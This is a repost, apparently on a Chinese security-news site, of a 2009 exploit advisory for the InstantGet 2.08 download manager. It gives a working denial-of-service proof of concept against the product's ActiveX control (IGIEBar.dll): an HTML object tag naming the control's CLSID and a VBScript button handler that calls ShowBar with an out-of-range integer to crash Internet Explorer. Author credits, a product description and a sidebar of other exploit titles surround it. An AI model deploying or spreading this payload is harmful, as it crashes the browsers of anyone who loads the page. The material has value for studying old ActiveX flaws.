InstantGet version 2.08 Active-X related denial of service exploit that leverage

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

InstantGet version 2.08 Active-X related denial of service exploit that leverage

来源：the_3dit0r[at]Yahoo[dot]coM 作者：the_Edit0r 发布时间：2009-09-21

"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""  :::::: ::   ::       ::        ::  ::  ::::        """
"""  ::      :: ::        :: :::::: .. ::::   ::        """
"""  :::::    :::   ::::: :: ::  :: ::  ::  ::::        """
"""  ::      :: ::  ::  : :: ::  :: ::  ::    ::        """
"""  :::::: ::   :: ::::: :: :::::: ::  ::  :::: rs.ir  """
"""                 ::                                  """
"""                                                     """
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
   Anti-Security Research Team & Security Institute

#[+] Bug : InstanGet v2.08 Activex (IGIEBar.dll) Denail of Service Expl0it
#[+] program  Download : http://www.instantget.com/
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 with Internet Explorer 7
#[+] web site: Expl0iters.ir  * Anti-security.ir
#[+] Big thnx: Aria-Security Team & H4ckcity Member


# Part Description :
--------------------

InstantGet is a powerful and efficient download manager and accelerator,
InstantGet splits downloading files into multiple sections, downloading
each section simultaneously to increase downloading speed up to 5 times
faster. InstantGet provides rich management features, that make it easier
to organize your downloads and manage proxies and sites. InstantGet has
many convenient features especially for downloaded files; Downloaded files
could be searched by URL, filename or comment; Features found in windows
explorer could be found in InsteantGet too, right click on the downloaded
files to popup an extended explorer context menu. InstantGet supports ftp
and http protocols, proxy servers, file redirects, cookies, directories with
authorization, InstantGet integrates seamlessly into Microsoft Internet Explorer
to automatically handle your downloads and can monitor clipboard. You can also
drag and drop download URLs or use InstantGet from command line.


# Part Expl0it & Bug Codes ( Poc ) : 
------------------------------------

targetFile = "E:\Program Files\InstantGet\IEBar\IGIEBar.dll"

------------------------------------


<object classid='clsid:98C92840-EB1C-40BD-B6A5-395EC9CD6510' id='target' />

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>

arg1=-2147483647

target.ShowBar arg1 

</script>
</span></span>
</code></pre>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告